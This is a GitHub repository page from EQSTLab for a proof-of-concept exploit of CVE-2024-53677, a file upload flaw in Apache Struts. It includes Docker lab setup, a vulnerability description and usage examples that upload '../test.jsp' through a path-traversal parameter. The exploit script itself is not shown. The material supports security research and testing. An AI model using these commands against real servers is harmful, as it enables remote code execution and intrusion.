Skip to content

EQSTLab/CVE-2024-53677

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
docker
docker
 
 
CVE-2024-53677.py
CVE-2024-53677.py
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 
test.txt
test.txt
 
 

Repository files navigation

This post is a research article published by EQSTLab.

CVE-2024-53677

★ CVE-2024-53677 Unrestricted Upload of File with Dangerous Type and RCE PoC ★

Lab Setup

cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677

Timeline

Dec 11 : CVE-2024-53677 File Upload PoC Uploaded

Description

CVE-2024-53677 : File upload logic in Apache Struts is flawed. An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution. This issue affects Apache Struts: from 2.0.0 before 6.4.0. Users are recommended to upgrade to version 6.4.0 at least and migrate to the new file upload mechanism https://struts.apache.org/core-developers/file-upload . If you are not using an old file upload logic based on FileuploadInterceptor your application is safe. You can find more details in https://cwiki.apache.org/confluence/display/WW/S2-067.

How to use

Git clone

git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677

Install packages

pip install -r requirements.txt

Command

# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>

Example

python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt

Output

CVE-2024-53677.py

Result

Disclaimer

This repository is not intended to be Object injection exploit to CVE-2024-53677. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

EQST Insight

We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do

Reference

https://nvd.nist.gov/vuln/detail/CVE-2024-53677

https://y4tacker.github.io/2024/12/16/year/2024/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E9%80%BB%E8%BE%91%E7%BB%95%E8%BF%87-CVE-2024-53677-S2-067/

https://attackerkb.com/topics/YfjepZ70DS/cve-2024-53677

https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker

About

File upload logic flaw in Apache Struts2 exploit

Topics

java security proof-of-concept jsp vulnerability struts2 cve-2024-53677

Resources

Readme
Activity

Stars

8 stars

Watchers

1 watching

Forks

1 fork
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages